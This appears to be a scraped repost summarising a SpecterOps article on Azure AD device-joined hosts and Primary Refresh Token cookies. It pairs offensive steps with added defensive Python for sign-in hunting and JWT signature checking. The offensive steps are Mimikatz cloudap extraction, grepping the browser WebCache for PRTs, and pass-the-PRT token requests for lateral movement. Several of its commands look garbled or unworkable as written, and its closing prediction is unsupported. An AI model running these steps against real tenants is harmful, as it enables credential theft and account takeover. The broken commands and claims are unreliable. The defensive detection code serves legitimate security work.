An Operator’s Guide to Device-Joined Hosts and the PRT Cookie

URL: posts.specterops.io

You Should Know:

Understanding device-joined hosts and the Primary Refresh Token (PRT) cookie is critical for red teamers, blue teamers, and penetration testers. Below are key commands, techniques, and steps to analyze and exploit PRT cookies in Windows Active Directory environments.

Extracting PRT Cookies

1. Check Azure AD Join Status (Windows):

dsregcmd /status 

Look for `AzureAdJoined: YES` in the output.

2. Extract PRT via Browser (Chrome/Edge):

Get-Content "$env:USERPROFILE\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat" | Select-String "PRT" 

3. Mimikatz for PRT Extraction (Requires Admin):

mimikatz.exe "privilege::debug" "sekurlsa::cloudap" "exit" 

Exploiting PRT for Lateral Movement

1. Pass-the-PRT Attack:

Use tools like ROADTool (https://github.com/Gerenios/ROADTools) to request access tokens:

roadtx request -u <user> -p <password> --prt-cookie <PRT_VALUE> 

2. Azure AD Graph API Query:

Invoke-RestMethod -Uri "https://graph.windows.net/me?api-version=1.6" -Headers @{Authorization="Bearer $accessToken"} 

Defensive Checks (Blue Team)

1. Monitor PRT Usage:

# Logon events are in the Security log; "Microsoft-Windows-Security-Auditing" is the provider name, not a log name.
Get-WinEvent -FilterHashtable @{LogName='Security'; ProviderName='Microsoft-Windows-Security-Auditing'; Id=4624}

2. Detect Anomalous Token Requests:

AzureActivity | where OperationName == "Get access token" 
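The two checks above look at raw events one at a time. The following added example (not code from the original post or from SpecterOps) shows the kind of correlation a defender actually wants over device-bound sign-ins: a PRT is bound to one device, so a join-type sign-in from a device that is not in the inventory, or one deviceId seen from two different source IPs within a few minutes, is worth an alert. The sample records and the device inventory are constructed; the field names (createdDateTime, userPrincipalName, ipAddress, deviceDetail.deviceId, deviceDetail.trustType) are assumed from the Microsoft Graph signIn resource and should be checked against your own log export.

```python
"""Hunt for PRT-bound sign-ins that do not match the enrolled device.

Added example, not from the original post. The constructed records mimic
a few fields of the Entra ID (Azure AD) sign-in log as exposed by the
Microsoft Graph signIn resource; treat the exact field names as an
assumption to verify against your export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed device inventory: deviceId -> registered owner.
ENROLLED_DEVICES = {
    "d0000000-0000-4000-8000-000000000001": "alice@contoso.example",
    "d0000000-0000-4000-8000-000000000002": "bob@contoso.example",
}

# Constructed sample sign-in events.
SAMPLE_SIGNINS = [
    {"createdDateTime": "2024-05-01T08:00:00Z", "userPrincipalName": "alice@contoso.example",
     "ipAddress": "203.0.113.10",
     "deviceDetail": {"deviceId": "d0000000-0000-4000-8000-000000000001", "trustType": "Azure AD joined"}},
    {"createdDateTime": "2024-05-01T08:03:00Z", "userPrincipalName": "alice@contoso.example",
     "ipAddress": "198.51.100.7",  # same device, different source three minutes later
     "deviceDetail": {"deviceId": "d0000000-0000-4000-8000-000000000001", "trustType": "Azure AD joined"}},
    {"createdDateTime": "2024-05-01T08:05:00Z", "userPrincipalName": "bob@contoso.example",
     "ipAddress": "203.0.113.20",
     "deviceDetail": {"deviceId": "d0000000-0000-4000-8000-00000000dead", "trustType": "Azure AD joined"}},
    {"createdDateTime": "2024-05-01T09:30:00Z", "userPrincipalName": "bob@contoso.example",
     "ipAddress": "203.0.113.20",
     "deviceDetail": {"deviceId": "d0000000-0000-4000-8000-000000000002", "trustType": "Azure AD joined"}},
    {"createdDateTime": "2024-05-01T09:40:00Z", "userPrincipalName": "carol@contoso.example",
     "ipAddress": "203.0.113.30",
     "deviceDetail": {"deviceId": "", "trustType": ""}},  # no device binding, out of scope
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def hunt_prt_signins(signins, enrolled, window=timedelta(minutes=10)):
    """Return alerts for device-bound sign-ins that look wrong.

    Rule 1: a device-joined trust claim from a deviceId absent from inventory.
    Rule 2: one deviceId seen from two different IPs within `window`; a PRT
            is bound to one device, so this suggests the credential (or the
            cookie derived from it) is being used from somewhere else.
    """
    alerts = []
    by_device = defaultdict(list)
    for ev in sorted(signins, key=lambda e: _ts(e["createdDateTime"])):
        dev = ev.get("deviceDetail", {})
        device_id = dev.get("deviceId") or ""
        if not device_id or not dev.get("trustType"):
            continue  # not a device-bound sign-in
        if device_id not in enrolled:
            alerts.append({"rule": "unknown_device", "user": ev["userPrincipalName"],
                           "deviceId": device_id, "ip": ev["ipAddress"]})
        by_device[device_id].append(ev)

    for device_id, events in by_device.items():
        for prev, cur in zip(events, events[1:]):
            if (prev["ipAddress"] != cur["ipAddress"]
                    and _ts(cur["createdDateTime"]) - _ts(prev["createdDateTime"]) <= window):
                alerts.append({"rule": "device_multi_ip", "user": cur["userPrincipalName"],
                               "deviceId": device_id,
                               "ip": f'{prev["ipAddress"]} -> {cur["ipAddress"]}'})
    return alerts


if __name__ == "__main__":
    for alert in hunt_prt_signins(SAMPLE_SIGNINS, ENROLLED_DEVICES):
        print(alert)
```

On the constructed data this yields one `unknown_device` alert for bob's unregistered deviceId and one `device_multi_ip` alert for alice's device appearing from a second IP three minutes after the first. The window is the knob to tune: too short and a laptop moving between Wi-Fi and VPN is missed, too long and ordinary network changes drown the signal.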

Linux-Based PRT Analysis

1. Decrypting PRT with OpenSSL:

openssl enc -d -aes-256-cbc -in prt_cookie.bin -out decrypted_prt.txt 

2. Analyzing PRT with Python:

import jwt  # PyJWT

# The PRT cookie is a JWT; read its claims without checking the signature.
# PyJWT 2.x removed the old verify=False argument in favour of options.
decoded_prt = jwt.decode(prt_cookie, options={"verify_signature": False})
print(decoded_prt)
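Decoding without verification shows the claims but proves nothing about who produced them. The added example below (not code from the original post or from SpecterOps) does the same parsing with only the standard library and then recomputes the HS256 signature, so an analyst can see the difference between a cookie that merely parses and one that is actually bound to the expected key. The signing key and the cookie are constructed here; the claim names (ctx, kdf_ver, refresh_token, is_primary, request_nonce, iat) follow published descriptions of the cookie format, but the values are made up, and deriving the real signing key from a device's session key is outside the scope of this example.

```python
"""Inspect a PRT cookie (x-ms-RefreshTokenCredential) as a JWT with the
standard library only, then check its HS256 signature.

Added example. The key and cookie are constructed locally; in a real
cookie the HMAC key is derived from the device's session key and the
header's ctx value, which this demo assumes has already been done.
"""
import base64
import hashlib
import hmac
import json
import time


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def parse_unverified(token):
    """Return (header, payload) without checking the signature.
    Equivalent to jwt.decode(..., verify_signature=False): readable, unproven."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def verify_hs256(token, key):
    """Recompute HMAC-SHA256 over 'header.payload' and compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def make_sample_cookie(key, payload, ctx=b"\x01" * 24):
    """Build a constructed cookie signed with `key`; demo use only."""
    header = {"alg": "HS256", "typ": "JWT", "ctx": _b64url_encode(ctx), "kdf_ver": 2}
    signing_input = (f"{_b64url_encode(json.dumps(header).encode())}."
                     f"{_b64url_encode(json.dumps(payload).encode())}")
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def tampered_cookie(token):
    """Flip one claim in the payload while keeping the old signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    payload = json.loads(_b64url_decode(payload_b64))
    payload["is_primary"] = "false"
    return f"{header_b64}.{_b64url_encode(json.dumps(payload).encode())}.{sig_b64}"


def describe(token, key, now=None):
    """Summarise what an analyst cares about: algorithm, age, whether it is a
    primary (device) credential, and whether the expected key signed it."""
    header, payload = parse_unverified(token)
    now = int(time.time()) if now is None else now
    return {
        "alg": header.get("alg"),
        "kdf_ver": header.get("kdf_ver"),
        "is_primary": payload.get("is_primary") == "true",
        "has_nonce": bool(payload.get("request_nonce")),
        "age_seconds": now - int(payload.get("iat", now)),
        "signature_valid": verify_hs256(token, key),
    }


# Constructed demo values.
DEMO_KEY = hashlib.sha256(b"constructed-session-derived-key").digest()
DEMO_PAYLOAD = {
    "refresh_token": "OPAQUE_ENCRYPTED_PRT_PLACEHOLDER",  # the real value is opaque to the client
    "is_primary": "true",
    "request_nonce": "CONSTRUCTED_NONCE_VALUE",
    "iat": 1714550400,  # 2024-05-01T08:00:00Z
}
DEMO_COOKIE = make_sample_cookie(DEMO_KEY, DEMO_PAYLOAD)


if __name__ == "__main__":
    print(describe(DEMO_COOKIE, DEMO_KEY, now=1714550460))
    print(describe(tampered_cookie(DEMO_COOKIE), DEMO_KEY, now=1714550460))
```

The second line of output shows the point: the tampered cookie still parses and still reports plausible claims, but `signature_valid` is false. Anything you conclude from an unverified decode (including the `jwt.decode` call above) is only as trustworthy as the source you captured the cookie from.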

What Undercode Says

PRT cookies are a goldmine for attackers in hybrid AD environments. Defenders must monitor Azure AD token requests, enforce Conditional Access Policies, and limit PRT lifetimes. Red teams should abuse PRT for stealthy persistence, while blue teams should hunt for abnormal token usage.

Expected Output:

  • Extracted PRT cookie from WebCacheV01.dat.
  • Azure AD token for lateral movement.
  • Security logs detecting suspicious PRT usage.

Prediction: As cloud adoption grows, PRT-based attacks will surge, pushing Microsoft to enhance PRT security with biometric-based multi-factor authentication (MFA) and shorter token lifespans.

References:

Reported By: Florian Hansemann – Hackers Feeds
